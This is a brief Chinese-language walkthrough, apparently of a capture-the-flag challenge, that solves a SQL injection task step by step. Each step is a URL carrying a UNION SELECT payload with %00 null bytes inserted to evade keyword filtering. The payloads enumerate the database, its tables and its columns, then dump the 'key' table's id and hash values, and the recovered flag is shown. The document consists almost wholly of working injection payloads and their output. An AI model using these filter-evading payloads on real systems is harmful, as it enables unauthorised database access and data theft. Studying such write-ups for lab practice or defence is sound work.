过程如下:
获取数据库 结果为 sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#
获取表 结果为 hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#
获取字段 key 表中的字段 结果为 id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#
获取最后结果 1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef (0x3a == : )
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key# |